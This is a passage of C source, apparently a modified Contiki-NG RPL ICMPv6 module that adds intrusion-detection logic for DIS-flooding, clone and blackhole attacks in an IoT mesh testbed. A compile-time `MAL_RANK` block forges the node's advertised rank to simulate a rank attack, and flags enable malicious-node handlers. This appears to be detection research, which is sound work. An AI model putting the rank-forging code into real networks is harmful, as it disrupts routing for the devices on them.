&rpl_multicast_addr;\n }\n\n LOG_INFO(\"sending a DIS to \");\n LOG_INFO_6ADDR(addr);\n LOG_INFO_(\"\\n\");\n\n \n uip_icmp6_send(addr, ICMP6_RPL, RPL_CODE_DIS, 2);\n \n}\n/*---------------------------------------------------------------------------*/\nstatic void\ndio_input(void)\n{\n unsigned char *buffer;\n uint8_t buffer_length;\n rpl_dio_t dio;\n uint8_t subopt_type;\n int i;\n int len;\n uip_ipaddr_t from;\n\n memset(&dio, 0, sizeof(dio));\n\n /* Set default values in case the DIO configuration option is missing. */\n dio.dag_intdoubl = RPL_DIO_INTERVAL_DOUBLINGS;\n dio.dag_intmin = RPL_DIO_INTERVAL_MIN;\n dio.dag_redund = RPL_DIO_REDUNDANCY;\n dio.dag_min_hoprankinc = RPL_MIN_HOPRANKINC;\n dio.dag_max_rankinc = RPL_MAX_RANKINC;\n dio.ocp = RPL_OF_OCP;\n dio.default_lifetime = RPL_DEFAULT_LIFETIME;\n dio.lifetime_unit = RPL_DEFAULT_LIFETIME_UNIT;\n\n uip_ipaddr_copy(&from, &UIP_IP_BUF->srcipaddr);\n\n buffer_length = uip_len - uip_l3_icmp_hdr_len;\n\n /* Process the DIO base option. */\n i = 0;\n buffer = UIP_ICMP_PAYLOAD;\n\n dio.instance_id = buffer[i++];\n dio.version = buffer[i++];\n dio.rank = get16(buffer, i);\n i += 2;\n\n dio.grounded = buffer[i] & RPL_DIO_GROUNDED;\n dio.mop = (buffer[i] & RPL_DIO_MOP_MASK) >> RPL_DIO_MOP_SHIFT;\n dio.preference = buffer[i++] & RPL_DIO_PREFERENCE_MASK;\n\n dio.dtsn = buffer[i++];\n /* two reserved bytes */\n\n \n //Get flag for IDS detectors\n // #if IDS_CLIENT==1 || IDS_SERVER == 1\n // // LOG_INFO(\"fromdiol:%d\",flag_is_ids);\n \n // uint8_t flag_ids;\n // flag_ids=buffer[i++];\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(&from);\n // // dio.flag_ids_node=flag_ids;\n \n // if (nbr!=NULL){\n // nbr->flag_ids_node=flag_ids;\n // }\n // i+=1; //increase position\n // if (flag_ids==2)\n // LOG_INFO(\"info from ids:%d\\n\",flag_ids);\n // #else\n i+= 2;\n // #endif\n\n memcpy(&dio.dag_id, buffer + i, sizeof(dio.dag_id));\n i += sizeof(dio.dag_id);\n\n /* Check if there are any DIO suboptions. */\n for (; i < buffer_length; i += len)\n {\n subopt_type = buffer[i];\n if (subopt_type == RPL_OPTION_PAD1)\n {\n len = 1;\n }\n else\n {\n /* Suboption with a two-byte header + payload */\n len = 2 + buffer[i + 1];\n }\n\n if (len + i > buffer_length)\n {\n LOG_ERR(\"dio_input: malformed packet, discard\\n\");\n goto discard;\n }\n\n switch (subopt_type)\n {\n case RPL_OPTION_DAG_METRIC_CONTAINER:\n if (len < 6)\n {\n LOG_WARN(\"dio_input: invalid DAG MC, len %u, discard\\n\", len);\n goto discard;\n }\n dio.mc.type = buffer[i + 2];\n dio.mc.flags = buffer[i + 3] << 1;\n dio.mc.flags |= buffer[i + 4] >> 7;\n dio.mc.aggr = (buffer[i + 4] >> 4) & 0x3;\n dio.mc.prec = buffer[i + 4] & 0xf;\n dio.mc.length = buffer[i + 5];\n\n if (dio.mc.type == RPL_DAG_MC_NONE)\n {\n /* No metric container: do nothing */\n }\n else if (dio.mc.type == RPL_DAG_MC_ETX)\n {\n dio.mc.obj.etx = get16(buffer, i + 6);\n }\n else if (dio.mc.type == RPL_DAG_MC_ENERGY)\n {\n dio.mc.obj.energy.flags = buffer[i + 6];\n dio.mc.obj.energy.energy_est = buffer[i + 7];\n }\n else\n {\n LOG_WARN(\"dio_input: unsupported DAG MC type %u, discard\\n\", (unsigned)dio.mc.type);\n goto discard;\n }\n break;\n case RPL_OPTION_ROUTE_INFO:\n if (len < 9)\n {\n LOG_WARN(\"dio_input: invalid destination prefix option, len %u, discard\\n\", len);\n goto discard;\n }\n\n /* The flags field includes the preference value. */\n dio.destination_prefix.length = buffer[i + 2];\n dio.destination_prefix.flags = buffer[i + 3];\n dio.destination_prefix.lifetime = get32(buffer, i + 4);\n\n if (((dio.destination_prefix.length + 7) / 8) + 8 <= len &&\n dio.destination_prefix.length <= 128)\n {\n memcpy(&dio.destination_prefix.prefix, &buffer[i + 8],\n (dio.destination_prefix.length + 7) / 8);\n }\n else\n {\n LOG_WARN(\"dio_input: invalid route info option, len %u, discard\\n\", len);\n goto discard;\n }\n\n break;\n case RPL_OPTION_DAG_CONF:\n if (len != 16)\n {\n LOG_WARN(\"dio_input: invalid DAG configuration option, len %u, discard\\n\", len);\n goto discard;\n }\n\n /* Path control field not yet implemented - at i + 2 */\n dio.dag_intdoubl = buffer[i + 3];\n dio.dag_intmin = buffer[i + 4];\n dio.dag_redund = buffer[i + 5];\n dio.dag_max_rankinc = get16(buffer, i + 6);\n dio.dag_min_hoprankinc = get16(buffer, i + 8);\n dio.ocp = get16(buffer, i + 10);\n /* buffer + 12 is reserved */\n dio.default_lifetime = buffer[i + 13];\n dio.lifetime_unit = get16(buffer, i + 14);\n break;\n case RPL_OPTION_PREFIX_INFO:\n if (len != 32)\n {\n LOG_WARN(\"dio_input: invalid DAG prefix info, len %u, discard\\n\", len);\n goto discard;\n }\n dio.prefix_info.length = buffer[i + 2];\n dio.prefix_info.flags = buffer[i + 3];\n /* valid lifetime is ingnored for now - at i + 4 */\n /* preferred lifetime stored in lifetime */\n dio.prefix_info.lifetime = get32(buffer, i + 8);\n /* 32-bit reserved at i + 12 */\n memcpy(&dio.prefix_info.prefix, &buffer[i + 16], 16);\n break;\n default:\n LOG_WARN(\"dio_input: unsupported suboption type in DIO: %u, discard\\n\", (unsigned)subopt_type);\n goto discard;\n }\n }\n\n LOG_INFO(\"received a %s-DIO from \",\n uip_is_addr_mcast(&UIP_IP_BUF->destipaddr) ? \"multicast\" : \"unicast\");\n LOG_INFO_6ADDR(&from);\n LOG_INFO_(\", instance_id %u, DAG ID \", (unsigned)dio.instance_id);\n LOG_INFO_6ADDR(&dio.dag_id);\n LOG_INFO_(\", version %u, dtsn %u, rank %u\\n\",\n (unsigned)dio.version,\n (unsigned)dio.dtsn,\n (unsigned)dio.rank);\n\n rpl_process_dio(&from, &dio);\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dio_output(uip_ipaddr_t *uc_addr)\n{\n unsigned char *buffer;\n int pos;\n uip_ipaddr_t *addr = uc_addr;\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n \n if (rpl_get_leaf_only())\n {\n /* In leaf mode, we only send DIO messages as unicasts in response to\n unicast DIS messages. */\n if (uc_addr == NULL)\n {\n /* Do not send multicast DIO in leaf mode */\n return;\n }\n }\n \n\n /* DAG Information Object */\n pos = 0;\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer[pos++] = curr_instance.instance_id;\n buffer[pos++] = curr_instance.dag.version;\n\n#if MAL_RANK\n //Modify rank\n curr_instance.dag.rank = 130;\n#endif\n\n \n if (rpl_get_leaf_only())\n {\n set16(buffer, pos, RPL_INFINITE_RANK);\n }\n else\n {\n // LOG_INFO(\"myrank:%d\\n\",curr_instance.dag.rank);\n \n set16(buffer, pos, curr_instance.dag.rank);\n }\n\n //rank for ids\n\n pos += 2;\n\n buffer[pos] = 0;\n if (curr_instance.dag.grounded)\n {\n buffer[pos] |= RPL_DIO_GROUNDED;\n }\n\n buffer[pos] |= curr_instance.mop << RPL_DIO_MOP_SHIFT;\n buffer[pos] |= curr_instance.dag.preference & RPL_DIO_PREFERENCE_MASK;\n pos++;\n\n buffer[pos++] = curr_instance.dtsn_out;\n\n /* reserved 2 bytes */\n //Use this flag for IDS to recognize detector\n #if IDS_CLIENT==1\n buffer[pos++]=0x02;\n // LOG_INFO(\"SETTING ids %d\\n\",flag_is_ids);\n #elif IDS_SERVER == 1\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(addr);\n \n buffer[pos++]=0x02;\n if (uc_addr!=NULL)\n buffer[pos++]=flag_is_ids;\n // LOG_INFO(\"SETTING flag ids %d\\n\",flag_is_ids);\n #else\n buffer[pos]=0;\n // LOG_INFO(\"logfla:%d\",buffer[pos]);\n pos++; //flags\n #endif\n \n\n buffer[pos++] = 0; /* reserved */\n\n memcpy(buffer + pos, &curr_instance.dag.dag_id, sizeof(curr_instance.dag.dag_id));\n pos += 16;\n\n // #if IDS_CLIENT\n // if (flag_is_ids==2)\n // #else\n if (!rpl_get_leaf_only())\n {\n if (curr_instance.mc.type != RPL_DAG_MC_NONE)\n {\n buffer[pos++] = RPL_OPTION_DAG_METRIC_CONTAINER;\n buffer[pos++] = 6;\n buffer[pos++] = curr_instance.mc.type;\n buffer[pos++] = curr_instance.mc.flags >> 1;\n buffer[pos] = (curr_instance.mc.flags & 1) << 7;\n buffer[pos++] |= (curr_instance.mc.aggr << 4) | curr_instance.mc.prec;\n if (curr_instance.mc.type == RPL_DAG_MC_ETX)\n {\n buffer[pos++] = 2;\n set16(buffer, pos, curr_instance.mc.obj.etx);\n pos += 2;\n }\n else if (curr_instance.mc.type == RPL_DAG_MC_ENERGY)\n {\n buffer[pos++] = 2;\n buffer[pos++] = curr_instance.mc.obj.energy.flags;\n buffer[pos++] = curr_instance.mc.obj.energy.energy_est;\n }\n else\n {\n LOG_ERR(\"unable to send DIO because of unsupported DAG MC type %u\\n\",\n (unsigned)curr_instance.mc.type);\n return;\n }\n }\n }\n\n /* Always add a DAG configuration option. */\n buffer[pos++] = RPL_OPTION_DAG_CONF;\n buffer[pos++] = 14;\n buffer[pos++] = 0; /* No Auth, PCS = 0 */\n buffer[pos++] = curr_instance.dio_intdoubl;\n buffer[pos++] = curr_instance.dio_intmin;\n buffer[pos++] = curr_instance.dio_redundancy;\n set16(buffer, pos, curr_instance.max_rankinc);\n pos += 2;\n set16(buffer, pos, curr_instance.min_hoprankinc);\n pos += 2;\n /* OCP is in the DAG_CONF option */\n set16(buffer, pos, curr_instance.of->ocp);\n pos += 2;\n buffer[pos++] = 0; /* reserved */\n buffer[pos++] = curr_instance.default_lifetime;\n set16(buffer, pos, curr_instance.lifetime_unit);\n pos += 2;\n\n /* Check if we have a prefix to send also. */\n if (curr_instance.dag.prefix_info.length > 0)\n {\n buffer[pos++] = RPL_OPTION_PREFIX_INFO;\n buffer[pos++] = 30; /* always 30 bytes + 2 long */\n buffer[pos++] = curr_instance.dag.prefix_info.length;\n buffer[pos++] = curr_instance.dag.prefix_info.flags;\n set32(buffer, pos, curr_instance.dag.prefix_info.lifetime);\n pos += 4;\n set32(buffer, pos, curr_instance.dag.prefix_info.lifetime);\n pos += 4;\n memset(&buffer[pos], 0, 4);\n pos += 4;\n memcpy(&buffer[pos], &curr_instance.dag.prefix_info.prefix, 16);\n pos += 16;\n }\n\n // #if IDS_CLIENT\n // if (flag_is_ids==2)\n // #else\n if (!rpl_get_leaf_only())\n // #endif\n {\n addr = addr != NULL ? addr : &rpl_multicast_addr;\n }\n\n LOG_INFO(\"sending a %s-DIO with rank %u to \",\n uc_addr != NULL ? \"unicast\" : \"multicast\",\n (unsigned)curr_instance.dag.rank);\n LOG_INFO_6ADDR(addr);\n LOG_INFO_(\"\\n\");\n\n uip_icmp6_send(addr, ICMP6_RPL, RPL_CODE_DIO, pos);\n}\n/*---------------------------------------------------------------------------*/\nstatic void\ndao_input(void)\n{\n struct rpl_dao dao;\n uint8_t subopt_type;\n unsigned char *buffer;\n uint8_t buffer_length;\n int pos;\n int len;\n int i;\n uip_ipaddr_t from;\n\n memset(&dao, 0, sizeof(dao));\n\n dao.instance_id = UIP_ICMP_PAYLOAD[0];\n if (!curr_instance.used || curr_instance.instance_id != dao.instance_id)\n {\n LOG_ERR(\"dao_input: unknown RPL instance %u, discard\\n\", dao.instance_id);\n goto discard;\n }\n\n uip_ipaddr_copy(&from, &UIP_IP_BUF->srcipaddr);\n memset(&dao.parent_addr, 0, 16);\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer_length = uip_len - uip_l3_icmp_hdr_len;\n\n pos = 0;\n pos++; /* instance ID */\n dao.lifetime = curr_instance.default_lifetime;\n dao.flags = buffer[pos++];\n\n //Lets use reserve bit to recognize IDS, no nbr exist yet\n // #if IDS_CLIENT==1\n // char flag_ids=buffer[pos++];\n // // dao.ids_flag=flag_ids;\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(&UIP_IP_BUF->srcipaddr);\n // if (nbr!=NULL)\n // nbr->flag_ids_node=flag_ids;\n // else\n // LOG_INFO(\"Nbr ids error\\n\");\n // #else\n pos++; /* reserved */\n // #endif\n\n dao.sequence = buffer[pos++];\n\n /* Is the DAG ID present? */\n if (dao.flags & RPL_DAO_D_FLAG)\n {\n if (memcmp(&curr_instance.dag.dag_id, &buffer[pos], sizeof(curr_instance.dag.dag_id)))\n {\n LOG_ERR(\"dao_input: different DAG ID \");\n LOG_ERR_6ADDR((uip_ipaddr_t *)&buffer[pos]);\n LOG_ERR_(\", discard\\n\");\n goto discard;\n }\n pos += 16;\n }\n\n /* Check if there are any RPL options present. */\n for (i = pos; i < buffer_length; i += len)\n {\n subopt_type = buffer[i];\n if (subopt_type == RPL_OPTION_PAD1)\n {\n len = 1;\n }\n else\n {\n /* The option consists of a two-byte header and a payload. */\n len = 2 + buffer[i + 1];\n }\n\n switch (subopt_type)\n {\n case RPL_OPTION_TARGET:\n /* Handle the target option. */\n dao.prefixlen = buffer[i + 3];\n memset(&dao.prefix, 0, sizeof(dao.prefix));\n memcpy(&dao.prefix, buffer + i + 4, (dao.prefixlen + 7) / CHAR_BIT);\n break;\n case RPL_OPTION_TRANSIT:\n /* The path sequence and control are ignored. */\n /* pathcontrol = buffer[i + 3];\n pathsequence = buffer[i + 4];*/\n dao.lifetime = buffer[i + 5];\n if (len >= 20)\n {\n memcpy(&dao.parent_addr, buffer + i + 6, 16);\n }\n break;\n }\n }\n\n /* Destination Advertisement Object */\n LOG_INFO(\"received a %sDAO from \", dao.lifetime == 0 ? \"No-path \" : \"\");\n LOG_INFO_6ADDR(&UIP_IP_BUF->srcipaddr);\n LOG_INFO_(\", seqno %u, lifetime %u, prefix \", dao.sequence, dao.lifetime);\n LOG_INFO_6ADDR(&dao.prefix);\n LOG_INFO_(\", prefix length %u, parent \", dao.prefixlen);\n LOG_INFO_6ADDR(&dao.parent_addr);\n LOG_INFO_(\" \\n\");\n\n rpl_process_dao(&from, &dao);\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dao_output(uint8_t lifetime)\n{\n unsigned char *buffer;\n uint8_t prefixlen;\n int pos;\n const uip_ipaddr_t *prefix = rpl_get_global_address();\n uip_ipaddr_t *parent_ipaddr = rpl_neighbor_get_ipaddr(curr_instance.dag.preferred_parent);\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n if (!curr_instance.used)\n {\n LOG_WARN(\"rpl_icmp6_dao_output: not in an instance, skip sending DAO\\n\");\n return;\n }\n\n if (curr_instance.dag.preferred_parent == NULL)\n {\n LOG_WARN(\"rpl_icmp6_dao_output: no preferred parent, skip sending DAO\\n\");\n return;\n }\n\n if (prefix == NULL || parent_ipaddr == NULL || curr_instance.mop == RPL_MOP_NO_DOWNWARD_ROUTES)\n {\n LOG_WARN(\"rpl_icmp6_dao_output: node not ready to send a DAO (prefix %p, parent addr %p, mop %u)\\n\",\n prefix, parent_ipaddr, curr_instance.mop);\n return;\n }\n\n buffer = UIP_ICMP_PAYLOAD;\n pos = 0;\n\n buffer[pos++] = curr_instance.instance_id;\n buffer[pos] = 0;\n#if RPL_WITH_DAO_ACK\n if (lifetime != 0)\n {\n buffer[pos] |= RPL_DAO_K_FLAG;\n }\n#endif /* RPL_WITH_DAO_ACK */\n \n \n ++pos; \n buffer[pos++]=0;\n buffer[pos++] = curr_instance.dag.dao_last_seqno;\n\n /* create target subopt */\n prefixlen = sizeof(*prefix) * CHAR_BIT;\n buffer[pos++] = RPL_OPTION_TARGET;\n buffer[pos++] = 2 + ((prefixlen + 7) / CHAR_BIT);\n buffer[pos++] = 0; /* reserved */\n buffer[pos++] = prefixlen;\n memcpy(buffer + pos, prefix, (prefixlen + 7) / CHAR_BIT);\n pos += ((prefixlen + 7) / CHAR_BIT);\n\n /* Create a transit information sub-option. */\n buffer[pos++] = RPL_OPTION_TRANSIT;\n buffer[pos++] = 20;\n buffer[pos++] = 0; /* flags - ignored */\n buffer[pos++] = 0; /* path control - ignored */\n buffer[pos++] = 0; /* path seq - ignored */\n buffer[pos++] = lifetime;\n\n /* Include parent global IP address */\n memcpy(buffer + pos, &curr_instance.dag.dag_id, 8); /* Prefix */\n pos += 8;\n memcpy(buffer + pos, ((const unsigned char *)parent_ipaddr) + 8, 8); /* Interface identifier */\n pos += 8;\n\n LOG_INFO(\"sending a %sDAO seqno %u, tx count %u, lifetime %u, prefix \",\n lifetime == 0 ? \"No-path \" : \"\",\n curr_instance.dag.dao_last_seqno, curr_instance.dag.dao_transmissions, lifetime);\n LOG_INFO_6ADDR(prefix);\n LOG_INFO_(\" to \");\n LOG_INFO_6ADDR(&curr_instance.dag.dag_id);\n LOG_INFO_(\", parent \");\n LOG_INFO_6ADDR(parent_ipaddr);\n LOG_INFO_(\"\\n\");\n\n /* Send DAO to root (IPv6 address is DAG ID) */\n uip_icmp6_send(&curr_instance.dag.dag_id, ICMP6_RPL, RPL_CODE_DAO, pos);\n}\n#if RPL_WITH_DAO_ACK\n/*---------------------------------------------------------------------------*/\nstatic void\ndao_ack_input(void)\n{\n uint8_t *buffer;\n uint8_t instance_id;\n uint8_t sequence;\n uint8_t status;\n\n buffer = UIP_ICMP_PAYLOAD;\n\n instance_id = buffer[0];\n //Get the flag for IDS detector in reserved field\n // #if IDS_CLIENT==1 || IDS_SERVER == 1\n // char flag_ids=buffer[1];\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(&UIP_IP_BUF->srcipaddr);\n // if (nbr!=NULL)\n // nbr->flag_ids_node=flag_ids;\n\n // if (flag_ids==2)\n // LOG_INFO(\"Parsedaoack %d\\n\",flag_ids);\n // #endif\n\n sequence = buffer[2];\n status = buffer[3];\n\n if (!curr_instance.used || curr_instance.instance_id != instance_id)\n {\n LOG_ERR(\"dao_ack_input: unknown instance, discard\\n\");\n goto discard;\n }\n\n LOG_INFO(\"received a DAO-%s with seqno %d (%d %d) and status %d from \",\n status < RPL_DAO_ACK_UNABLE_TO_ACCEPT ? \"ACK\" : \"NACK\", sequence,\n curr_instance.dag.dao_last_seqno, curr_instance.dag.dao_last_seqno, status);\n LOG_INFO_6ADDR(&UIP_IP_BUF->srcipaddr);\n LOG_INFO_(\"\\n\");\n\n rpl_process_dao_ack(sequence, status);\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dao_ack_output(uip_ipaddr_t *dest, uint8_t sequence, uint8_t status)\n{\n unsigned char *buffer;\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer[0] = curr_instance.instance_id;\n \n //IDS detector send flag in reserve bit field\n #if IDS_SERVER == 1\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(dest);\n // if (nbr!=NULL)\n // buffer[1]=nbr->flag_ids_node;\n // else{\n buffer[1]=flag_is_ids;\n // LOG_INFO(\"No ids flag\\n\");\n \n #else\n buffer[1] = 0; /* reserved */\n #endif\n \n buffer[2] = sequence;\n buffer[3] = status;\n\n LOG_INFO(\"sending a DAO-%s seqno %d to \",\n status < RPL_DAO_ACK_UNABLE_TO_ACCEPT ? \"ACK\" : \"NACK\", sequence);\n LOG_INFO_6ADDR(dest);\n LOG_INFO_(\" with status %d\\n\", status);\n\n uip_icmp6_send(dest, ICMP6_RPL, RPL_CODE_DAO_ACK, 4);\n}\n#endif /* RPL_WITH_DAO_ACK */\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_init()\n{\n uip_icmp6_register_input_handler(&dis_handler);\n uip_icmp6_register_input_handler(&dio_handler);\n uip_icmp6_register_input_handler(&dao_handler);\n#if IDS_CLIENT==1 || IDS_SERVER == 1 /*IDS client*/\n uip_icmp6_register_input_handler(&ids_handler);\n#endif /*Only for IDS client*/\n\n#if IDS_SERVER==1\n uip_icmp6_register_input_handler(&ids_BH_handler);\n#endif\n\n#if IDS_CLIENT==0 && IDS_SERVER ==0 && MALICIOUS==0 && !CLONE_ATTACK && IDS_OF==1 /*IDS client*/\n uip_icmp6_register_input_handler(&ids_to_normal_handler);\n#endif /*Only for IDS client*/\n\n#if MAL_EXT\n uip_icmp6_register_input_handler(&mal_handler);\n#endif\n\n#if RPL_WITH_DAO_ACK\n uip_icmp6_register_input_handler(&dao_ack_handler);\n#endif /* RPL_WITH_DAO_ACK */\n}\n/*---------------------------------------------------------------------------*/\n\n//TODO: Store for 5 minutes malicious nodes and then reset stats (delete from array)\n\n#if IDS_CLIENT==1 || IDS_SERVER == 1\nvoid ids_output(uip_ipaddr_t *addr)\n{\n\n // simple_udp_sendto(&udp_conn, str, strlen(str), &dest_ipaddr);\n#if IDS_CLIENT==1\n uint16_t pos = 0;\n int k = 0;\n int16_t indexes[NODES_NUM_CL]; \n int countOutNodes = 0;\n#endif\n\n const uip_ipaddr_t *currentNodesAddr = rpl_get_global_address(); //uip_ds6_get_link_local(-1);\n\n //If border router: Do not send. Update trust at once.\n if (uip_ipaddr_cmp(addr, currentNodesAddr))\n {\n endofIP = IdsServerAddr.u8[sizeof(IdsServerAddr.u8) - 1]; \n }\n else\n {\n //Remove function to send to other nodes than root\n // if (addr->u8[sizeof(addr->u8)-1]!=1){\n // //added inint buffer\n // unsigned char *buffer;\n // buffer = UIP_ICMP_PAYLOAD;\n // // Get the number of nodes evaluated\n // uint16_t flag=1;\n // set16(buffer, pos, flag);\n // pos = pos + 2;\n // LOG_INFO(\"send simple flag\\n\");\n // uip_icmp6_send(addr, ICMP6_RPL,RPL_CODE_IDS, (2 + (flag*(sizeof(uint16_t)))));\n\n// }\n// I am Not border router.\n#if IDS_CLIENT==1\n //else{\n\n //Keep the index of malicious nodes.\n //countOutNodes=0;\n for (k = 0; k < NODES_NUM_CL; k++)\n {\n if (nodes[k].address == 0)\n continue;\n\n //Interval is 15 because formula in rpl-timers.c: expiration_time = RPL_DIS_INTERVAL / 2 + (random_rand() % (RPL_DIS_INTERVAL));\n //So DIS_INTERVAL is defined as 30 so the min allowed time is 15. DIS attack and Clone attacks\n \n\n if (nodes[k].spoof_suspicious == 1 || (nodes[k].intervals < 15 && nodes[k].counterDIS >= 3))\n {\n if (nodes[k].spoof_suspicious == 1)\n LOG_INFO(\"Clone attacker:%d s:%d\\n\", (unsigned)nodes[k].address, nodes[k].spoof_suspicious);\n else\n LOG_INFO(\"Maybe warn!!ID:%u total:%d dis:%d\\n\", (unsigned)nodes[k].address, (k + 1), nodes[k].counterDIS);\n\n countOutNodes = countOutNodes + 1;\n indexes[k] = 1;\n nodes[k].spoof_suspicious = 0;\n }\n }\n\n if (countOutNodes > 0)\n {\n // data_input++;\n // If no nodes are observed, do nothing.\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n pos = 0;\n buffer[pos++] = RPL_DEFAULT_INSTANCE; //IDS instance is 1\n // Get the number of nodes evaluated\n set16(buffer, pos, countOutNodes);\n pos = pos + sizeof(uint16_t);\n uint16_t c = 0;\n //Send list with possible malicious nodes\n for (k = 0; k < NODES_NUM_CL; k++)\n {\n // For each node observed, send its ip, count dis and other msgs.\n\n if (indexes[k] != 1)\n continue;\n else if (c >= countOutNodes)\n break;\n c += 1;\n //PRINTF(\"READY:%d %d %d\\n\",k,indexes[k],nodes[k].address);\n set16(buffer, pos, nodes[k].address);\n pos = pos + sizeof(uint16_t);\n\n set16(buffer, pos, nodes[k].counterDIS);\n pos = pos + sizeof(uint16_t);\n\n set16(buffer, pos, nodes[k].counterMsg);\n pos = pos + sizeof(uint16_t);\n\n set32(buffer, pos, nodes[k].intervals);\n //memcpy(buffer+pos,&nodes[k].intervals,4);\n pos = pos + sizeof(uint32_t);\n\n }\n LOG_PRINT(\"Send packet ids!\\n\");\n uip_icmp6_send(addr, ICMP6_RPL, RPL_CODE_IDS, 1 + sizeof(uint16_t) + (countOutNodes * (3 * sizeof(uint16_t) + sizeof(uint32_t))));\n //Send packet and reset\n //Why reset??\n // for (j=0; j<NODES_NUM_CL;j++){\n // if (nodes[j].address!=0){\n // nodes[j].address=0;\n // nodes[j].counterDIS=0;\n // nodes[j].counterMsg=0;\n // nodes[j].intervals=999;\n // //nodes[j].flag=0;\n // nodes[j].timestamp=0;\n // }\n // }\n }\n else\n {\n LOG_PRINT(\"NO NODES FROM DETECTOR!\\n\");\n }\n\n//}\n#endif /*ends IDS_CLIENT code*/\n }\n\n uipbuf_clear();\n}\n#endif /*IDS_CLIENT || IDS_SERVER*/\n\n/*---------------------------------------------------------------------------*/\n\n#if IDS_SERVER==1\nvoid ids_blackhole_input(void)\n{\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n\n LOG_INFO(\"received BH from client\\n\");\n\n uint16_t pos = 0;\n // uint8_t instance_id;\n // instance_id = buffer[pos++];\n \n\n if (!curr_instance.used || curr_instance.instance_id != buffer[pos++])\n {\n LOG_INFO(\"IDS IN: unknown instance, discard\\n\");\n\n goto discard;\n }\n\n uint8_t counter = (int)buffer[pos++];\n uint8_t i = 0;\n\n for (i = 0; i < counter; i++)\n {\n uint8_t ipend = buffer[pos++];\n\n uint8_t verified=buffer[pos];\n pos = pos + 3;\n // nbr->fw_packets += get16(buffer, pos);\n // pos = pos + sizeof(uint16_t);\n // nbr->flag_ids_node=1;\n\n LOG_INFO(\"bh n:%d val:%d\\n\",ipend,verified);\n\n uint32_t curr_time=clock_time();\n uint8_t flag_interval=0;\n // LOG_INFO(\"time:%d,%d\\n\",curr_time,last_time_from_ids);\n\n if (BR_last_time_from_ids+150 > curr_time ){\n flag_interval=1;\n }\n\n BR_last_time_from_ids=curr_time;\n\n //Check if node exist in blacklist or add it\n if (verified==1 || (flag_interval==0 && verified==0 && ipend!=0)){\n for (int j=0; j<NODES_NUM;j++){\n if (nodes[j].address!=0 && nodes[j].address == ipend){\n if (verified==1 && nodes[j].blackhole_mal>0)\n nodes[j].blackhole_mal=nodes[j].blackhole_mal-1;\n else if (verified==0)\n nodes[j].blackhole_mal=nodes[j].blackhole_mal+1;\n break;\n }\n if ((nodes[j].address==0 || j==NODES_NUM-1) && verified==0){\n nodes[j].address=ipend;\n nodes[j].intervals=999;\n nodes[j].blackhole_mal=1;\n break;\n }\n }\n \n }\n\n }\n\n goto discard;\n\n discard:\n uipbuf_clear();\n \n}\n#endif\n\n\n#if IDS_CLIENT==1 || IDS_SERVER == 1\nvoid ids_input(void)\n{\n#if IDS_SERVER == 1\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n uint8_t k = 0;\n#endif\n\n // uint16_t pos = 0;\n\n#if IDS_SERVER == 1 /*code for IDS_SERVER*/\n //The number of observed nodes\n LOG_INFO(\"GOT INPUT\\n\");\n uint16_t pos = 0;\n uint8_t detectorIP = UIP_IP_BUF->srcipaddr.u8[sizeof(UIP_IP_BUF->srcipaddr.u8) - 1];\n\n uint8_t instance_id;\n instance_id = buffer[pos++];\n\n if (!curr_instance.used || curr_instance.instance_id != instance_id)\n {\n LOG_INFO(\"IDS IN: unknown instance, discard\\n\");\n // uipbuf_clear();\n // return;\n goto discard;\n }\n\n countInNodes = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n \n //Save IDS detector's IP to not save it in monitored nodes.\n //TODO: REMOVE\n for (k = 0; k < DETECTORS_NUM; k++)\n {\n //PRINTF(\"detector:%d\\n\",detectorsIP[k]);\n if (detectorsIP[k] == detectorIP)\n {\n break;\n }\n else if (detectorsIP[k] == 0)\n {\n detectorsIP[k] = detectorIP;\n break;\n }\n }\n\n for (k = 0; k < countInNodes; k++)\n {\n // LOG_INFO(\"inside FOR\\n\");\n //Put each received observation into a temp. list.\n ip_end = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n uint16_t tmpdis = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n\n uint16_t tmpdio = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n\n uint32_t tmpinter = get32(buffer, pos);\n //memcpy(&tmpinter,buffer+ pos,4);\n pos = pos + sizeof(uint32_t);\n\n uint8_t j = 0, countflag = 0;\n char flag_detector = 0;\n uint8_t countme = 0;\n //Check if measurements is for IDS detector,then just return\n for (countme = 0; countme < DETECTORS_NUM; countme++)\n {\n if (ip_end == detectorsIP[countme])\n {\n countflag = 1;\n goto discard;\n }\n // return;\n }\n //check nodes, for python script\n LOG_INFO(\"chkns:%u %u %u %u\\n\", (unsigned)ip_end, tmpdis, tmpdio, (unsigned)tmpinter);\n\n // int8_t flagip=-1;\n //Find the node's address\n while (nodes[j].address != 0 && j < NODES_NUM)\n {\n //We avoid ids detector by dropping rpl_ids msg\n // if ((nodes[j].address==ip_end || nodes[j].address==detectorIP) && countflag==1){\n // //PRINTF(\"found:%d %u\\n\",j,(unsigned)nodes[j].address);\n // flagip=j;\n\n // j++;\n\n // }else\n\n if (nodes[j].address == ip_end && countflag == 0)\n {\n nodes[j].counterDIS = tmpdis;\n nodes[j].counterMsg = tmpdio;\n nodes[j].intervals = tmpinter;\n uint8_t c = 0;\n for (c = 0; c < DETECTORS_NUM; c++)\n {\n // 